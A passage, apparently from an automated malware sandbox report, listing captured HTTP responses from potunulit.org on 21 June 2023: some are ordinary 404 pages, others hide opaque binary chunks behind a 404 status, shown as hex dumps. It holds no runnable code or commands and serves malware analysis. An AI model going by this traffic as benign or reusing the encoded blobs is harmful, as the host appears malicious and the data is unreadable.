61 26 01 56 63 dd 28 c3 a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7d 3f 9a 19 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 36 4e c5 03 37 b1 a0 61 7e de f5 f6 ea 19 17 7e 4f af 9a a5 14 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b d1 bb 4b 9a 07 fd ec 0d f7 70 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 dd ec cd 4f 13 79 82 ae 9c 17 78 4d 7d be ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 4a 3b ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 cf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 47 b2 b6 1b 6f d3 cb 29 32 16 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 c3 fb 66 e5 a6 2d 11 9f 10 93 d0 b0 99 45 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fc aa 90 4e ce b4 bb 45 78 17 28 d2 de 3c 1e d0 a5 aa 7a 8f 9a 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b9 94 65 5c dc e5 7e 45 4e 70 d4 03 6b d6 99 76 84 0f ca 82 bf 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 Data Ascii: 4e4f`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*g'1e\;jKhc94dtb6rgwm\{HDB?n}:I(`{a&Vc(:V?#BSSQV+}?~ExU$$6N7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0tXam9VJd3cPxyhxAYaCZfDS9fZ7uNptxoVL3NqpfNZpIPToWSvWm0b9TlWNkoKQ90DllemAMK2KTaL%2FcW1Ed29%2Fa1z99VaOb3lMhgxoYUleilMG0iskaZhukNs08FGC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae48dcfad82c57-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zi4OisvXZMGlnYtiRpTiFENPMACkpZtWeYRuAZbDBR7lKsjMfrdqvTOopykvWWky4jjdizaPIrHmk11S8eqIl43dAlxEBzYcjk38usVi7BaDsxApI1AFPYsc1nNRXle0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae48df7f262c57-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 e9 67 27 0c f0 f8 31 65 5c a8 ca a9 80 3b 16 6a 96 b5 b8 4b 68 05 fb 63 f9 39 34 e8 af cb 10 aa c8 e2 fa dc 64 e3 74 dd 94 62 36 a5 04 c9 72 67 77 a6 09 e6 6d 9a 1e b1 5c 7b 48 44 d7 42 f8 da 08 d6 df 3f ba 0a 6e cc 7d 1b ed c2 8a a9 3a 49 f4 8f ce 28 60 de 7b d3 61 26 01 56 63 dd 28 c3 a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7d 3f 9a 19 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 36 4e c5 03 37 b1 a0 61 7e de f5 f6 ea 19 17 7e 4f af 9a a5 14 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b d1 bb 4b 9a 07 fd ec 0d f7 70 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 dd ec cd 4f 13 79 82 ae 9c 17 78 4d 7d be ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 4a 3b ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 cf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 47 b2 b6 1b 6f d3 cb 29 32 16 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 c3 fb 66 e5 a6 2d 11 9f 10 93 d0 b0 99 45 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fc aa 90 4e ce b4 bb 45 78 17 28 d2 de 3c 1e d0 a5 aa 7a 8f 9a 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b9 94 65 5c dc e5 7e 45 4e 70 d4 03 6b d6 99 76 84 0f ca 82 bf 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*g'1e\;jKhc94dtb6rgwm\{HDB?n}:I(`{a&Vc(:V?#BSSQV+}?~ExU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYO10FQiRYc5c7v%2BpmemH5VDsm2%2FFeRgQ3vC0wmukb1uBBxdROCpH8DG5L52zb%2FO8gpMUDzhUVroPqN3g49E3OhS16Rrpkn9y0rR4%2FaF33nS8%2Bk6SJuel0SRaBq8vZCp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae48e9cfdf2c57-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UN%2BMCWl6FtX847ZgZFLVp3zJIJdMVGTbQ6piMdK98urBBv%2BBq%2BTG%2B2A%2FnSOnv4ggdNjRm2M%2BaoQf0mSp0bLItthlC5fEae1C60lqNzInI5MyNZh%2F1X7KYO0yzIiX438t"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae48ee6ecb2c57-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x7oPmQwExSeoWTO2dPbndCEwMz3g%2B8ZIkPgbxDYhfp82kMer4o3rZW25tWQDrAQ6M6p8h0EnzEwUDaQ4Cczu1JyhJFNgln82Zdqc1%2BdOVrKkil%2F8iCT9mxOUu%2FX4wh2O"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49145d4a9968-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:23:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cuPDrCZkejLJHh4twk%2F2jvMHdEkY16jzPnzVdaVmcZwb4T0r%2B41k5rIlbjkzzocg31VT50cUk1ghJQaNnzu4KxsSSJBz1qQeAxOC1mAWU%2F0pUySA%2Fw%2BECOJv%2B3hj%2FXoC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49154e319968-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3d 44 55 3b be 63 1c 61 0d 0a Data Ascii: 26Uys/~(`:I_Ny=DU;ca
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n%2B94YvMrs0MusmRm7fCz4NyokmEqqA0KKCM0T91gRaNP2UjSEWEjL1SSLodY9vjdzusryc0dGL0fK4aGMbgukD3HI9AIQFnkVVpydjVrzHSW%2Bv9kmmuxBH8fdvQiOUnM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae493b9a8d2c4f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9eLvpEwfQ6dX052T5A0hrgkv0VBiFo6A7EgGQpmfoExuhp%2FJd%2BKyIqMeFn9HClEaNNi8xsLmKJ6tBG0c2bMm7TNIrY4BkaRUq9ALQR2%2FN7lH8My7Ou6Dj5%2BQ6qfcJ9Cv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae493cac852c4f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 94 02 c5 5b c0 ff 01 b1 2c e2 23 41 5c 39 f3 7f 4a 67 83 55 66 1f 74 c1 e2 8d b2 d1 21 dc 28 3a 50 20 0d 0a Data Ascii: 36Uys/~(u:R[,#A\9JgUft!(:P
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=979jvKONkwosWzCSqvlhetCQnbw6w18IrXgGjQNZO8prIH0iR0epCALB8Ml9Ni2zGo598bXdocCBlWYIikoS8hwvDf011%2BpSF%2FhYSHN%2BhtiA%2F1lxjzHeu1lwAurjUBY8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49485b566903-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 18:24:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sYQPJvBNMDB2L2IQ5eFL4DVugjtZtrN6ph85SK19CtrYiNIzj1Sqrg07bfi7mwHiw%2FVMUZA6DSqU2meXIJJZ4b2SigL4HD%2Fdb86%2BapCdUh01jYelAmJqZjsDY7sdAm32"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7dae49493c506903-FRAalt-svc: h3=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 e9 67 27 0c f0 f8 31 65 5c a8 ca a9 80 3b 16 6a 96 b5 b8 4b 68 05 fb 63 f9 39 34 e8 af cb 10 aa c8 e2 fa dc 64 e3 74 dd 94 62 36 a5 04 c9 72 67 77 a6 09 e6 6d 9a 1e b1 5c 7b 48 44 d7 42 f8 da 08 d6 df 3f ba 0a 6e cc 7d 1b ed c2 8a a9 3a 49 f4 8f ce 28 60 de 7b d3 61 26 01 56 63 dd 28 c3 a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7d 3f 9a 19 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 36 4e c5 03 37 b1 a0 61 7e de f5 f6 ea 19 17 7e 4f af 9a a5 14 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b d1 bb 4b 9a 07 fd ec 0d f7 70 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 dd ec cd 4f 13 79 82 ae 9c 17 78 4d 7d be ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 4a 3b ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 cf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 47 b2 b6 1b 6f d3 cb 29 32 16 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 c3 fb 66 e5 a6 2d 11 9f 10 93 d0 b0 99 45 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fc aa 90 4e ce b4 bb 45 78 17 28 d2 de 3c 1e d0 a5 aa 7a 8f 9a 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b9 94 65 5c dc e5 7e 45 4e 70 d4 03 6b d6 99 76 84 0f ca 82 bf 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 